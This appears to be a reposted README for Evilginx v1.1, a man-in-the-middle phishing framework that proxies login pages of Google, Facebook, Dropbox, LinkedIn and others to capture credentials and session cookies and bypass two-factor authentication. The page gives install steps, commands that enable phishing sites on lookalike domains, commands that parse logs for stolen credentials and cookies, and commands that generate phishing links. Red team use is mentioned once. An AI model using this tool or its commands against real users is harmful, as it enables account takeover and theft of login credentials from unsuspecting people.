evilginx: Man-in-the-middle attack framework | phishing credentials & session cookies

Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It’s core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

Evilginx – Advanced Phishing With Two-factor Authentication Bypass

https://vimeo.com/212463675

Change log v.1.1

[+] Added iCloud.com support.
[+] Added Live.com support.
[+] Specifying domain name with ‘setup –enable’ is now optional if site was enabled before.
[+] Added ability to specify custom SSL/TLS certificates with –crt and –key arguments.
Custom certificates will be remembered and can be removed with –use_letsencrypt parameter.
[+] Added ‘server_names_hash_bucket_size: 128’ to support long hostnames.
[+] Fixed rare issue, which could be triggered when only visitor’s email was identified at the time
of truncating logs, after parsing, breaking the chain of logged requests, which would miss an
email address on next parse.
[+] Fixed several typos in site config files. (@poweroftrue)
[+] Fixed issue with Nginx proxy bailing out on receiving too big upstream responses.
[+] Fixed issue with Facebook overwriting redirection cookie with ‘deleted’ (@poweroftrue)
[+] Fixed “speedbump” redirection for Google site config that asks user to provide his phone number.
[+] Fixed bug that would raise exception when disabling site configs without them being enabled first.
[+] Nginx access_log directory can now be changed with VAR_LOGS constant in evilginx.py.
[+] Added ‘update.sh’ file which should be executed after every ‘git pull’ to update nginx config files.
[+] Added Dockerfile

Installation

Evilginx provides an installation script install.sh that takes care of installing the whole package on any Debian wheezy/jessie machine, in fire and forget manner.

git clone https://github.com/kgretzky/evilginx

cd evilginx

chmod 700 install.sh

./install.sh



How to update:

# pull latest changes from GitHub

git pull  

# run update script to make sure your Nginx configuration files are up-to-date

./update.sh

# re-enable every site config you may have been using to update them to their latest versions

./evilginx.py setup --enable <site_name>

Usage

           _ _       _            

           (_) |     (_)           

  _____   ___| | __ _ _ _ __ __  __

 / _ \ \ / / | |/ _` | | '_ \\ \/ /

|  __/\ V /| | | (_| | | | | |>  < 

 \___| \_/ |_|_|\__, |_|_| |_/_/\_\

                 __/ |             

 by @mrgretzky  |___/          v1.0



usage: evilginx.py [-h] {setup,parse,genurl} ...



positional arguments:

  {setup,parse,genurl}

    setup               Configure Evilginx.

    parse               Parse log file(s).

    genurl              Generate phishing URL.



optional arguments:

  -h, --help            show this help message and exit

List available site configuration templates:

python evilginx.py setup -l



Listing available supported sites:



 - dropbox (/root/evilginx/sites/dropbox/config)

   subdomains: www

 - google (/root/evilginx/sites/google/config)

   subdomains: accounts, ssl

 - facebook (/root/evilginx/sites/facebook/config)

   subdomains: www, m

 - linkedin (/root/evilginx/sites/linkedin/config)

   subdomains: www

Enable google phishing site with preregistered phishing domain not-really-google.com:

python evilginx.py setup --enable google -d not-really-google.com

Disable facebook phishing site:

python evilginx.py setup --disable facebook

Parse

Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in logs directory, where evilginx.py script resides. This can be done automatically after you enable auto-parsing in the Setup phase.

usage: evilginx.py parse [-h] -s SITE [--debug]



optional arguments:

  -h, --help            show this help message and exit

  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs

                        for all sites).

  --debug               Does not truncate log file after parsing.

Parse logs only for google site:

python evilginx.py parse -s google

Parse logs for all available sites:

python evilginx.py parse -s all

Generate URL

Generate phishing URLs that you can use in your Red Team Assessments.

usage: evilginx.py genurl [-h] -s SITE -r REDIRECT



optional arguments:

  -h, --help            show this help message and exit

  -s SITE, --site SITE  Name of site to generate link for.

  -r REDIRECT, --redirect REDIRECT

                        Redirect user to this URL after successful sign-in.

Generate google phishing URL that will redirect victim to rick’roll video on successful login:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ



Generated following phishing URLs:



 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

 Source

https://github.com/kgretzky/evilginx